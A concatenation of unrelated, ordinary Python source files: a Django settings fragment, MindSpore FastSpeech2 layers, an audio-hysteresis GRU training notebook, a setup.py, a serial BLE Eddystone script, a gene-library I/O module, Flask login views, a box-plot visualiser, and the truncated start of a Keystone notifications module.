redis_pass = os.environ.get("REDIS_PASS", False)
redis_ssl = os.environ.get("REDIS_SSL", "False") == "True"

# Default time-to-live (seconds) for enqueued RQ jobs.
RQ_DEFAULT_TTL = int(os.environ.get("RQ_DEFAULT_TTL", "60"))

INGEST_QUEUE = "ingest"

# Every queue uses the same Redis connection settings. Build each entry as a
# fresh dict so later per-queue mutations (e.g. PASSWORD below) cannot leak
# between queues through a shared reference.
_RQ_QUEUE_NAMES = [
    "default",
    "cavatica",
    "dataservice",
    "releases",
    "aws",
    "slack",
    INGEST_QUEUE,
]
RQ_QUEUES = {
    name: {
        "HOST": redis_host,
        "PORT": redis_port,
        "DB": 0,
        "DEFAULT_TIMEOUT": 30,
        "SSL": redis_ssl,
    }
    for name in _RQ_QUEUE_NAMES
}

if redis_pass:
    # Bug fix: the password was previously only applied to the "default" and
    # "cavatica" queues, so any other queue failed to authenticate against a
    # password-protected Redis. Apply it uniformly.
    for _queue_config in RQ_QUEUES.values():
        _queue_config["PASSWORD"] = redis_pass
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
    },
    {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
    {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
    {
        "NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"
    },
]

# Custom user model lives in the creator app.
AUTH_USER_MODEL = "creator.User"

# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/

LANGUAGE_CODE = "en-us"

TIME_ZONE = "UTC"

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Logging Configuration

LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {
        "worker": {
            "format": "[{asctime}] {levelname} {module}: {message}",
            "datefmt": "%H:%M:%S",
            "style": "{",
        }
    },
    "handlers": {
        "command": {
            "level": "INFO",
            "class": "rq.utils.ColorizingStreamHandler",
            "formatter": "worker",
        },
        "rq_console": {
            "level": "ERROR",
            "class": "rq.utils.ColorizingStreamHandler",
            "formatter": "worker",
        },
        "task": {
            "level": "INFO",
            "class": "rq.utils.ColorizingStreamHandler",
            "formatter": "worker",
        },
    },
    "loggers": {
        "rq.worker": {"handlers": ["rq_console"], "level": "ERROR"},
        "TaskLogger": {"handlers": ["task"], "level": "INFO"},
        "creator": {"handlers": ["task"], "level": "INFO"},
        "creator.ingest_runs.genomic_data_loader": {
            "handlers": ["task"],
            "level": "DEBUG",
            "propagate": False,
        },
    },
}

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/

STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, "static")

# Email
EMAIL_BACKEND = os.environ.get(
    "EMAIL_BACKEND", "django.core.mail.backends.smtp.EmailBackend"
)
EMAIL_HOST = os.environ.get("EMAIL_HOST")
EMAIL_PORT = os.environ.get("EMAIL_PORT")
EMAIL_HOST_USER = os.environ.get("EMAIL_HOST_USER")
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD")
EMAIL_USE_TLS = os.environ.get("EMAIL_USE_TLS")
EMAIL_USE_SSL = os.environ.get("EMAIL_USE_SSL", False)
DEFAULT_FROM_EMAIL = os.environ.get(
    "DEFAULT_FROM_EMAIL", "admin@kidsfirstdrc.org"
)

# Sets the file storage backend
# Supports file system storage and s3 storage
DEFAULT_FILE_STORAGE = os.environ.get(
    "DEFAULT_FILE_STORAGE", "django.core.files.storage.FileSystemStorage"
)
# Maximum upload size in bytes (2**29 = 512 MiB).
FILE_MAX_SIZE = 2 ** 29
# Maximum time in s allowed before a token may no longer be used to download
DOWNLOAD_TOKEN_TTL = 30
# The relative path directory to upload files to when using file system storage
# The object prefix to upload under when using S3 storage
UPLOAD_DIR = os.environ.get("UPLOAD_DIR", "uploads/")
# Bucket in s3 to keep logs at
LOG_BUCKET = os.environ.get("LOG_BUCKET", "kf-study-creator-logging")
# The relative path to the directory where job logs will be stored
LOG_DIR = os.environ.get("LOG_DIR", "logs/")

AWS_S3_BUCKET_NAME = "kf-study-us-east-1-dev-sd-me0owme0w"
# Auth0 settings
AUTH0_DOMAIN = os.environ.get("AUTH0_DOMAIN", "https://kids-first.auth0.com")
AUTH0_JWKS = os.environ.get(
    "AUTH0_JWKS", "https://kids-first.auth0.com/.well-known/jwks.json"
)
AUTH0_AUD = os.environ.get(
    "AUTH0_AUD", "https://kf-study-creator.kidsfirstdrc.org"
)
# Service auth credentials
# Bug fix: the environment variable name was previously misspelled
# "AUTH0_SERIVCE_AUD". Prefer the correct spelling, but fall back to the old
# name so existing deployments that still set the misspelled variable keep
# working.
AUTH0_SERVICE_AUD = os.environ.get(
    "AUTH0_SERVICE_AUD",
    os.environ.get(
        "AUTH0_SERIVCE_AUD", "https://kf-study-creator.kidsfirstdrc.org"
    ),
)
AUTH0_MANAGEMENT_AUD = os.environ.get(
    "AUTH0_MANAGEMENT_AUD", "https://kids-first.auth0.com/api/v2/"
)
AUTH0_CLIENT = os.environ.get("AUTH0_CLIENT")
AUTH0_SECRET = os.environ.get("AUTH0_SECRET")
# Cache key and lifetime (seconds) for the Auth0 public key.
CACHE_AUTH0_KEY = os.environ.get("CACHE_AUTH0_KEY", "AUTH0_PUBLIC_KEY")
# Bug fix: cast to int so a value supplied via the environment (always a
# string) is usable as a numeric cache timeout.
CACHE_AUTH0_TIMEOUT = int(os.environ.get("CACHE_AUTH0_TIMEOUT", 86400))

CLIENT_ADMIN_SCOPE = "role:admin"

# Number of seconds after which to timeout any outgoing requests
# Bug fix: cast to int for the same reason as CACHE_AUTH0_TIMEOUT.
REQUESTS_TIMEOUT = int(os.environ.get("REQUESTS_TIMEOUT", 30))
REQUESTS_HEADERS = {"User-Agent": "StudyCreator/development (python-requests)"}
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Fastspeech2 Layers"""
import mindspore.nn as nn
from .SubLayers import MultiHeadAttention, PositionwiseFeedForward
class FFTBlock(nn.Cell):
    """Feed-Forward Transformer block (FastSpeech2): multi-head
    self-attention followed by a position-wise feed-forward network."""

    def __init__(self, d_model, n_head, d_k, d_v, d_inner, kernel_size, dropout=0.1):
        super(FFTBlock, self).__init__()
        self.slf_attn = MultiHeadAttention(
            n_head, d_model, d_k, d_v, dropout=dropout)
        self.pos_ffn = PositionwiseFeedForward(
            d_model, d_inner, kernel_size, dropout=dropout)

    def construct(self, enc_input, mask=None, slf_attn_mask=None):
        """Apply self-attention then the FFN; returns (output, attention).

        NOTE(review): `mask` is accepted but not used in this method —
        confirm whether callers rely on it.
        """
        attn_out, attn_weights = self.slf_attn(
            enc_input, enc_input, enc_input, mask=slf_attn_mask)
        ffn_out = self.pos_ffn(attn_out)
        return ffn_out, attn_weights
class ConvNorm(nn.Cell):
    """Thin wrapper around ``nn.Conv1d`` with length-preserving default
    padding for odd kernel sizes."""

    def __init__(
        self,
        in_channels,
        out_channels,
        kernel_size=1,
        stride=1,
        padding=None,
        dilation=1,
        bias=True,
        w_init_gain="linear",
    ):
        super(ConvNorm, self).__init__()
        # Default to symmetric padding that keeps the sequence length
        # unchanged; only well-defined for odd kernels.
        if padding is None:
            assert kernel_size % 2 == 1
            padding = int(dilation * (kernel_size - 1) / 2)
        # NOTE(review): `w_init_gain` is accepted for API compatibility but
        # is not applied to any weight initialization here — confirm intent.
        self.conv = nn.Conv1d(
            in_channels,
            out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            dilation=dilation,
            has_bias=bias,
            pad_mode="pad",
        )

    def construct(self, signal):
        """Apply the 1-D convolution to a channel-first input."""
        return self.conv(signal)
class PostNet(nn.Cell):
    """
    PostNet: Five 1-d convolution with 512 channels and kernel size 5

    Stages: mel -> embedding, (n-2) embedding -> embedding, embedding -> mel.
    All stages except the last are followed by tanh; every stage is followed
    by dropout.
    """

    def __init__(
        self,
        n_mel_channels=80,
        postnet_embedding_dim=512,
        postnet_kernel_size=5,
        postnet_n_convolutions=5,
    ):
        super(PostNet, self).__init__()
        same_padding = int((postnet_kernel_size - 1) / 2)

        def _conv_stage(in_ch, out_ch, gain):
            # One convolution stage wrapped in a SequentialCell.
            return nn.SequentialCell([
                ConvNorm(
                    in_ch,
                    out_ch,
                    kernel_size=postnet_kernel_size,
                    stride=1,
                    padding=same_padding,
                    dilation=1,
                    w_init_gain=gain,
                ),
            ])

        self.convolutions = nn.CellList()
        # First stage: mel channels -> embedding dimension.
        self.convolutions.append(
            _conv_stage(n_mel_channels, postnet_embedding_dim, "tanh"))
        # Middle stages: embedding -> embedding.
        for _ in range(1, postnet_n_convolutions - 1):
            self.convolutions.append(
                _conv_stage(postnet_embedding_dim, postnet_embedding_dim, "tanh"))
        # Final stage: embedding -> mel channels, linear gain.
        self.convolutions.append(
            _conv_stage(postnet_embedding_dim, n_mel_channels, "linear"))
        self.tanh = nn.Tanh()
        self.dropout = nn.Dropout(0.5)

    # x : (88, 1289, 80)
    def construct(self, x):
        """Refine the input; shape (batch, time, mels) in and out."""
        # Convolutions run channel-first, so move mels to axis 1.
        x = x.transpose((0, 2, 1))
        for stage_idx in range(len(self.convolutions) - 1):
            x = self.dropout(self.tanh(self.convolutions[stage_idx](x)))
        x = self.dropout(self.convolutions[-1](x))
        return x.transpose((0, 2, 1))
|
# %%
# Load dependencies
import numpy as np
import matplotlib.pyplot as plt
import audio_dspy as adsp
import scipy.signal as signal
import tensorflow as tf
from tensorflow import keras
import librosa
from tqdm import tqdm
import os
import random
import sys
sys.path.append('..')
from utils.utils import plot_fft, load_fma_file
from utils.model import Model
import utils.losses as losses
# %%
# load files
filepath = '../Data/fma_small/'
files = os.listdir(filepath)
NUM_FILES = 10
NUM_SAMPLES = 20000
FS = 96000
clean_data = []
for i in tqdm(range(NUM_FILES)):
    x = load_fma_file(files, filepath, FS, NUM_SAMPLES)
    clean_data.append(x)
clean_data = np.asarray(clean_data)
print(np.shape(clean_data))
# %%
# look at file
idx = 4
plt.plot(clean_data[idx])
# %%
# Generate training targets: run each clean clip through a hysteresis model
# at a randomly chosen drive level, and keep the drive as a per-sample input.
hyst_data = []
drive_data = []
for x in tqdm(clean_data):
    drive = random.choice([0.05, 0.25, 0.5, 0.75, 1.0])
    hyst = adsp.Hysteresis(drive, 1.0, 1.0, FS, mode='RK4')
    y = hyst.process_block(x)
    # Drive is constant per clip, broadcast to the clip length.
    drive_data.append(np.ones_like(x) * drive)
    hyst_data.append(y.astype(np.float32))
# %%
idx = 4
plt.figure()
plt.plot(clean_data[idx])
plt.plot(hyst_data[idx])
plt.plot(drive_data[idx])
plt.figure()
freqs, x_fft = plot_fft(clean_data[idx], FS)
freqs, y_fft = plot_fft(hyst_data[idx], FS)
plt.semilogx(freqs, x_fft)
plt.semilogx(freqs, y_fft)
# %%
# Split clips into train/validation and shape as (clips, samples, features).
NUM_TRAIN = 9
NUM_VAL = 1
x_data = np.stack((clean_data, drive_data), axis=1)
print(x_data.shape)
x_train, x_val = np.split(x_data, [NUM_TRAIN])
y_train, y_val = np.split(hyst_data, [NUM_TRAIN])
# %%
OUT_train = np.reshape(y_train, (NUM_TRAIN, NUM_SAMPLES, 1))
OUT_val = np.reshape(y_val, (NUM_VAL, NUM_SAMPLES, 1))
IN_train = np.reshape(x_train.transpose((0, 2, 1)), (NUM_TRAIN, NUM_SAMPLES, 2))
IN_val = np.reshape(x_val.transpose((0, 2, 1)), (NUM_VAL, NUM_SAMPLES, 2))
print(np.shape(IN_train))
# %%
plt.plot(IN_train[0, :, 0])
plt.plot(IN_train[0, :, 1])
print(IN_train.dtype)
print(OUT_train.dtype)
# %%
def model_loss(target_y, predicted_y):
    """Training loss: pre-emphasized error-to-signal ratio plus DC loss."""
    return losses.esr_loss(target_y, predicted_y, losses.pre_emphasis_filter) + losses.dc_loss(target_y, predicted_y)
# construct model
# Inputs are (time, 2): [clean signal, drive]; output is (time, 1) hysteresis.
model = Model(model_loss, optimizer=keras.optimizers.Adam(learning_rate=5.0e-4))
model.model.add(keras.layers.InputLayer(input_shape=(None, 2)))
model.model.add(keras.layers.GRU(units=32, return_sequences=True))
model.model.add(keras.layers.Dense(1))
model.model.summary()
# %%
# Train for 50 epochs on the clip-level train/val split built above.
model.train(50, IN_train, OUT_train, IN_val, OUT_val)
# %%
# plot metrics
plt.figure()
model.plot_loss()
plt.figure()
model.plot_error()
# %%
# Test prediction
idx = 2
print(np.shape(x_data[idx]))
predictions = model.model.predict(IN_train[idx].reshape(1, NUM_SAMPLES, 2)).flatten()
print(np.shape(predictions))
# Plot the predictions along with the test data
plt.clf()
plt.title('Training data predicted vs actual values')
plt.plot(hyst_data[idx], 'c', label='Actual')
plt.plot(predictions, 'r--', label='Predicted')
plt.legend()
plt.xlim(1000, 4000)
plt.xlabel('Time [samples]')
# %%
# Frequency-domain comparison of prediction vs target.
freqs, pred_fft = plot_fft(predictions, FS)
freqs, target_fft = plot_fft(hyst_data[idx], FS)
# Plot the predictions along with to the test data
plt.clf()
plt.title('Training data predicted vs actual values')
plt.semilogx(freqs, target_fft, 'b', label='Actual')
plt.semilogx(freqs, pred_fft, 'r--', label='Predicted')
plt.legend()
plt.xlim(50, 20000)
plt.ylim(-5)
plt.xlabel('Frequency [Hz]')
plt.ylabel('Magnitude [dB]')
# %%
|
from setuptools import setup, find_packages
from datetime import datetime
# Version is date-stamped at build time: 0.0.<YYYYMMDDHHMMSS>.
now = datetime.now()
date_time = now.strftime("%Y%m%d%H%M%S")
version_number = "0.0." + date_time
# Record the generated version so it can be read back later.
# NOTE(review): this file write happens on every import/execution of setup.py.
with open("version_info.txt", "w") as f:
    f.write(version_number)
with open("README.md", "r") as readme_file:
    readme = readme_file.read()
requirements = ["pandas==1.4.1"]
setup(
    name="stockeasy",
    version=version_number,
    author="Adam Blacke",
    author_email="adamblacke@gmail.com",
    description="A package for a quick and dirty portfolio analysis.",
    long_description=readme,
    long_description_content_type="text/markdown",
    url="https://github.com/AdamBlacke/stockeasy",
    packages=find_packages(where='src'),
    package_dir={'': 'src'},
    install_requires=requirements,
    classifiers=[
        "Programming Language :: Python :: 3.8",
        "License :: OSI Approved :: MIT License",
    ],
)
|
"""Eddystone example: send an Eddystone-URL advertisement via a serial BLE dongle."""
import serial
import time

connecting_to_dongle = 0
print("Connecting to dongle...")
# Trying to connect to dongle until connected. Make sure the port and baudrate is the same as your dongle.
# You can check in the device manager to see what port then right-click and choose properties then the Port Settings
# tab to see the other settings
while connecting_to_dongle == 0:
    try:
        console = serial.Serial(
            port='COM14',
            baudrate=57600,
            parity="N",
            stopbits=1,
            bytesize=8,
            timeout=0
        )
        # serial.Serial.is_open is already a bool; no need for __bool__().
        if console.is_open:
            connecting_to_dongle = 1
    except serial.SerialException:
        # Catch only serial errors so e.g. Ctrl-C can still abort the retry
        # loop (the original bare `except:` swallowed everything).
        print("Dongle not connected. Please reconnect Dongle.")
        time.sleep(5)
print("\n\nConnected to Dongle.\n")
print("\n Welcome to the Eddystone example!\n\n")
# Sentinel: 1 until the user has been prompted once; afterwards it holds the
# entered hex string, so the prompt is shown only on the first iteration.
new_input = 1
while console.is_open:
    # get keyboard input once
    if new_input == 1:
        # Python 2 users
        # input = raw_input("Enter the Eddystone url hex string: ")
        new_input = input("Enter the Eddystone url hex string: ")
    time.sleep(0.1)
    # sends the commands to the dongle. Important to send the \r as that is the return-key.
    console.write(str.encode("AT+ADVDATA=03:03:aa:fe "))
    console.write(new_input.encode())
    console.write('\r'.encode())
    time.sleep(0.1)
    console.write(str.encode("AT+ADVSTART=0;200;3000;0;"))
    console.write('\r'.encode())
    out = ''
    # let's wait one second before reading output (let's give device time to answer)
    time.sleep(1)
    # `in_waiting` replaces the deprecated `inWaiting()` (pySerial >= 3.0).
    while console.in_waiting > 0:
        out += console.read(console.in_waiting).decode()
    else:
        if not out.isspace():
            # We make sure it doesn't print the same message over and over again by setting [out] to blankspace
            # after printing once and check for blankspace before print again
            print(">>" + out)
            out = " "
|
"""
Pypkg
"""
|
"""This module contains input/output functions.
There are two types of data being handled: session data and gene library data.
Session data:
A dict containing the following attributes from the SessionData object:
* general_settings
* param_info
* advanced_mutate
* global_stats_display
* evolve_property_settings
and
* model_data: a list of dictionaries each describing the current state
of one of the nine Simulation objects, with the following format
{"params": sim.params,
"state": sim.state,
"global_stats": sim.global_stats,
"step": sim.step}
The functions ``save_session_data`` and ``load_session_data`` save and load
session data respectively for a given file path.
Gene library data:
Under LIB_PATH, there is a json file storing the parameters of all saved
simulations (called genes), their identifier string, and display locations
in the library window. In addition, thumbnail images for each simulation
are stored in separate png files under the same directory.
The json file has format:
{
"items": {
"hn90y8ws": some params...,
"h0suw44x": some params...
...
},
"loc": {
"0": "h0suw44x",
"3": "hn90y8ws",
...
}
}
The function ``random_string`` generates identifiers for genes to be
stored. ``load_params`` loads the json file from LIB_PARAMS_JSON_PATH.
``delete_gene`` removes the information associated with a given gene (its
png file and related entries in the json file). ``delete_all_genes``
deletes everything. ``save_gene`` saves a gene to files given its
parameters and figure.
"""
import json
import os
from random import choice
import numpy as np
from parameters import PARAM_INFO
# Gene-library data lives in 'libdata' next to this package's parent directory.
LIB_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'libdata')
LIB_PARAMS_JSON_PATH = os.path.join(LIB_PATH, "params.json")
def fit_into(x, a, b):
    """Clamp *x* into the closed interval [a, b] (assumes a <= b)."""
    capped_above = min(x, b)
    return max(capped_above, a)
def gene2params(gene):
    """Convert from gene format (for one cell type) to params format (for
    three cell types).

    :param gene: dict of single-cell-type parameter values
    :return: params dict where per-cell-type values are expanded to
        3-element lists (cell type 0 carries the gene's value), rounded to
        the precision declared in ``PARAM_INFO``.
    """
    # Map "Adhesion" from (-1, 1) through tan into (0, inf) via exp; fit_into
    # keeps the tan argument away from its poles at +/-pi/2.
    adh = np.exp(np.tan(fit_into(gene["Adhesion"], -0.99, 0.99)*np.pi/2))
    params = {
        "Alignment Range": gene["Alignment Range"],
        "Pinned Cells": ["none"] * 3,
        "Interaction Force": gene["Interaction Force"],
        "Gradient Intensity": [gene["Gradient Intensity"],
                               0.0,
                               0.0
                               ],
        "Cell Ratio": [1.0, 0.0, 0.0],
        "Alignment Force": gene["Alignment Force"],
        "Noise Intensity": gene["Noise Intensity"],
        "Angular Inertia": gene["Angular Inertia"],
        "Adhesion": [
            [round(adh, PARAM_INFO["Adhesion"]["roundto"]), 0., 0.],
            [0., 0., 0.],
            [0., 0., 0.]
        ],
        "Gradient Direction": [gene["Gradient Direction"], 0.0, 0.0],
        "Cell Density": gene["Cell Density"],
        "Velocity": [gene["Velocity"], 0., 0.],
        "Interaction Range": gene["Interaction Range"]
    }
    # Rounding: for list-valued params round the cell-type-0 entry; for
    # scalar params round the value itself. Tuple isinstance replaces the
    # original duplicated isinstance(..., int) or isinstance(..., float).
    for each in params:
        value = params[each]
        if isinstance(value, list):
            if isinstance(value[0], (int, float)):
                # `value` aliases the list stored in params, so this mutates
                # params[each] in place.
                value[0] = round(value[0], PARAM_INFO[each]["roundto"])
        elif isinstance(value, (int, float)):
            params[each] = round(value, PARAM_INFO[each]["roundto"])
    return params
def load_from_files(input_file_name):
    """Load a gene JSON file and return its params dictionary.

    Accepts either a file with a top-level "gene" key or a bare gene dict
    (detected by the presence of "Gradient Intensity").

    :raises IOError: if the file matches neither format.
    """
    with open(input_file_name, "r") as infile:
        temp = json.load(infile)
    if "gene" in temp:
        gene = temp["gene"]
    elif "Gradient Intensity" in temp:
        gene = temp
    else:
        raise IOError("Failed to open gene. This file does not have the correct format.")
    return gene2params(gene)
def save_session_data(output_file_name, session_data):
    """Serialize *session_data* as JSON to *output_file_name*."""
    with open(output_file_name, 'w') as handle:
        json.dump(session_data, handle)
def load_session_data(input_file_name):
    """Read and return session data stored as JSON at *input_file_name*."""
    with open(input_file_name, "r") as handle:
        return json.load(handle)
def random_string(length, allchar="0123456789abcdefghijklmnopqrstuvwxyz"):
    """Generate a random identifier of *length* characters from *allchar*."""
    picked = [choice(allchar) for _ in range(length)]
    return "".join(picked)
def load_params(path):
    """Load and return gene library data from a json file.

    Falls back to a fresh empty library dict when the file is missing or
    not valid JSON.
    """
    try:
        with open(path, "r") as handle:
            return json.load(handle)
    except (IOError, ValueError):
        # Missing or corrupt library file: start with an empty library.
        return {"items": {}, "loc": {}}
def delete_all_genes():
    """Remove all library data by deleting all png files and the json file.

    Silently does nothing when the library json is missing or unreadable.
    """
    try:
        with open(LIB_PARAMS_JSON_PATH, "r") as infile:
            data = json.load(infile)
    except (IOError, ValueError):
        # No library on disk: nothing to delete.
        return
    # Each saved gene has a thumbnail <gene_id>.png under LIB_PATH.
    for gene_id in data["items"]:
        figure_path = os.path.join(LIB_PATH, "{}.png".format(gene_id))
        os.remove(figure_path)
    os.remove(LIB_PARAMS_JSON_PATH)
def delete_gene(gene_id):
    """Delete the png file associated with a specific gene, and remove its
    entry from the json file.

    Display locations in data["loc"] are keyed by stringified indices
    "0".."n-1"; entries after the deleted gene are shifted up by one so the
    keys stay contiguous.
    """
    try:
        with open(LIB_PARAMS_JSON_PATH, "r") as infile:
            data = json.load(infile)
    except (IOError, ValueError):
        # No library on disk: nothing to delete.
        return
    # Move up locations following the deleted spot
    flag = False  # becomes True once the deleted gene's slot is found
    for i in range(len(data["items"])):
        if flag:
            data["loc"][str(i-1)] = data["loc"][str(i)]
        else:
            if data["loc"][str(i)] == gene_id:
                flag = True
    # Delete the last spot
    data["loc"].pop(str(len(data["items"])-1))
    # Delete from items
    data["items"].pop(gene_id)
    # Save json file
    with open(LIB_PARAMS_JSON_PATH, 'w') as outfile:
        json.dump(data, outfile, indent=4, separators=(',', ': '))
    # Delete figure
    figure_path = os.path.join(LIB_PATH, "{}.png".format(gene_id))
    os.remove(figure_path)
def save_gene(params, fig):
    """Write a gene's information to files: save a thumbnail figure to png and
    add an entry to the json parameters file.

    :param params: parameter dict to store under a new random identifier
    :param fig: matplotlib figure saved as the gene's thumbnail
    """
    data = load_params(LIB_PARAMS_JSON_PATH)
    # Generate new identifier, make sure it doesn't clash with ones that exist
    gene_id = random_string(8)
    while gene_id in data["items"]:
        gene_id = random_string(8)
    # Add entry and save json file; the new gene takes the next display slot.
    data["loc"][str(len(data["items"]))] = gene_id
    data["items"][gene_id] = params
    with open(LIB_PARAMS_JSON_PATH, 'w') as outfile:
        json.dump(data, outfile, indent=4, separators=(',', ': '))
    # Save figure
    figure_path = os.path.join(LIB_PATH, "{}.png".format(gene_id))
    fig.savefig(figure_path, edgecolor='w', facecolor='w', dpi=48)
|
"""Module to allow logins on the site."""
from flask import render_template, flash, redirect, url_for, session, abort, g
from .models import db, User
from .forms import AuthForm, RegisterForm
from . import app
import functools
def login_required(view):
    """Decorator: respond with 404 when no user is logged in.

    Returning 404 (rather than redirecting to login) hides the protected
    page's existence from anonymous visitors.
    """
    @functools.wraps(view)
    def wrapped_view(**kwargs):
        # g.user is populated by load_logged_in_user before each request.
        if g.user is None:
            abort(404)
        return view(**kwargs)
    return wrapped_view
@app.before_request
def load_logged_in_user():
    """Attach the logged-in user (or None) to ``g`` before every request."""
    user_id = session.get('user_id')
    g.user = None if user_id is None else User.query.get(user_id)
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Allow the user to register a new login.

    On a valid submission, creates the User row and redirects to the login
    page; otherwise flashes the error and re-renders the form.
    """
    form = RegisterForm()
    if form.validate_on_submit():
        email = form.data['email']
        password = form.data['password']
        first_name = form.data['first_name']
        last_name = form.data['last_name']
        error = None
        if not email or not password:
            error = 'Invalid email or password'
        if User.query.filter_by(email=email).first() is not None:
            error = f'{email} has already been registered.'
        if error is None:
            # NOTE(review): password is passed through as submitted --
            # confirm the User model hashes it before storage.
            user = User(
                email=email,
                password=password,
                first_name=first_name,
                last_name=last_name)
            db.session.add(user)
            db.session.commit()
            flash('Registration complete. You may now log in.')
            return redirect(url_for('.login'))
        flash(error)
    return render_template('auth/register.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate user.

    On success, resets the session, stores the user id, and redirects to
    the portfolio view; on failure flashes a generic error (no hint as to
    whether the email or the password was wrong).
    """
    form = AuthForm()
    if form.validate_on_submit():
        email = form.data['email']
        password = form.data['password']
        error = None
        user = User.query.filter_by(email=email).first()
        if user is None or not User.check_credentials(user, password):
            error = 'Invalid username or password.'
        if error is None:
            # session.clear() prevents session fixation before storing the id.
            session.clear()
            session['user_id'] = user.id
            return redirect(url_for('.portfolio'))
        flash(error)
    return render_template('auth/login.html', form=form)
@app.route('/logout')
def logout():
    """Log the user out and return to the login page."""
    # Clear first, then flash: flash() writes into the (now fresh) session,
    # so the farewell message survives the redirect.
    session.clear()
    flash('Thanks for visiting!')
    return redirect(url_for('.login'))
|
import matplotlib.pyplot as plt
import os
import pandas as pd
class Visualize():
    """Produce plots (currently box plots) from a precomputed cluster-quality
    assessment (``quality_df.json``) of clustered DBD folders."""
    def __init__(self, path_to_folder_of_assessment_file, path_to_folder_of_DBDs, output_folder, dbd_for_plot, task='boxplot'):
        """
        :param path_to_folder_of_assessment_file: folder path from where assesment file should be taken
        :param path_to_folder_of_DBDs: this folder should contain clustered DBD folders
        :param output_folder: folder where visualization output should go
        :param dbd_for_plot: path of dbd which is needed to be visualized, or 'all'
        :param task: which visualization task needed. e.g., boxplot etc
        """
        if os.path.exists(os.path.join(path_to_folder_of_assessment_file, 'quality_df.json')):
            quality_df = pd.read_json(os.path.join(path_to_folder_of_assessment_file, 'quality_df.json'))
        else:
            print("Quality assesment file is not available. Please generate assessment by quality_cluster")
            # NOTE(review): bare exit() in library code terminates the whole
            # interpreter; consider raising an exception instead.
            exit()
        if 'boxplot' in task:
            if 'all' in dbd_for_plot:
                # Plot every non-hidden DBD folder in sorted order.
                for x in sorted(os.listdir(path_to_folder_of_DBDs)):
                    if x.startswith("."):
                        continue
                    dbd_for_plot = os.path.join(path_to_folder_of_DBDs, x)
                    dbd_for_plot = dbd_for_plot + '/'
                    self.print_boxplot_dbd(quality_df, dbd_for_plot, output_folder)
            else:
                self.print_boxplot_dbd(quality_df, dbd_for_plot, output_folder)
            print("You can see plots in ", output_folder)
    @staticmethod
    def print_boxplot_dbd(quality_df, plot_dbd, output_path):
        """Save a box plot of per-cluster similarity values for one DBD folder.

        Returns 1 (and plots nothing) when the folder is empty or the DBD
        has no clusters in the assessment.
        """
        if len(os.listdir(plot_dbd)) == 0:
            # print("No pwms in ", plot_dbd)
            return 1
        # The DBD name is the last path component (plot_dbd ends with '/').
        dbd_to_plot = str(plot_dbd).split('/')[-2]
        selected_dbd = quality_df.loc[quality_df['dbd'] == dbd_to_plot]
        similarityMatrices = []
        cluster_for_plotting = []
        # NOTE(review): columns 9 and 7 are addressed positionally -- confirm
        # the quality_df column order (9 = similarity values, 7 = a count
        # shown in the tick label).
        for row in range(len(selected_dbd)):
            similarityMatrices.append(selected_dbd.iloc[row, 9])
            cluster_for_plotting.append(str(row) + '(' + str(selected_dbd.iloc[row, 7]) + ')')
        labels = cluster_for_plotting
        if not len(labels):
            return 1
        fig, ax1 = plt.subplots(nrows=1, ncols=1, figsize=(24, 12))
        # rectangular box plot
        bplot1 = ax1.boxplot(similarityMatrices,
                             vert=True,  # vertical box alignment
                             patch_artist=True,  # fill with color
                             labels=labels)  # will be used to label x-ticks
        ax1.set_title('Rectangular box plot for ' + str(dbd_to_plot))
        # fill with colors
        # adding horizontal grid lines
        for ax in [ax1]:
            ax.yaxis.grid(True)
            ax.set_xlabel('Clusters')
            ax.set_ylabel('Observed Similarities')
        # plt.show()
        plt.xticks(rotation=45)
        path_to_boxplots = output_path
        if not os.path.exists(path_to_boxplots):
            os.makedirs(path_to_boxplots, exist_ok=True)
        plt.savefig(os.path.join(path_to_boxplots, dbd_to_plot + '_boxplot.png'))
        plt.close()
if __name__ == "__main__":
# Visualize('../data/in/','../data/out/clustering_out/','../data/out/plots/boxplots/', 'all')
# # stamp comparison
# Visualize('../../../../../Desktop/PhD/Publication/Next/Clustering/in/',
# '../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/New/STAMP/',
# '../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/plots/boxplots/', 'all')
#abc4pwm comparison
Visualize('../../../../../Desktop/PhD/Publication/Next/Clustering/in/',
'../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/quality_assessed_out_abc4pwm_old/',
'../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/plots/abc4pwm/boxplots/', 'all')
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Notifications module for OpenStack Identity Service resources"""
import functools

from keystone.openstack.common import log
from keystone.openstack.common.notifier import api as notifier_api
LOG = log.getLogger(__name__)
class ManagerNotificationWrapper(object):
    """Send event notifications for ``Manager`` methods.

    Sends a notification if the wrapped Manager method does not raise an
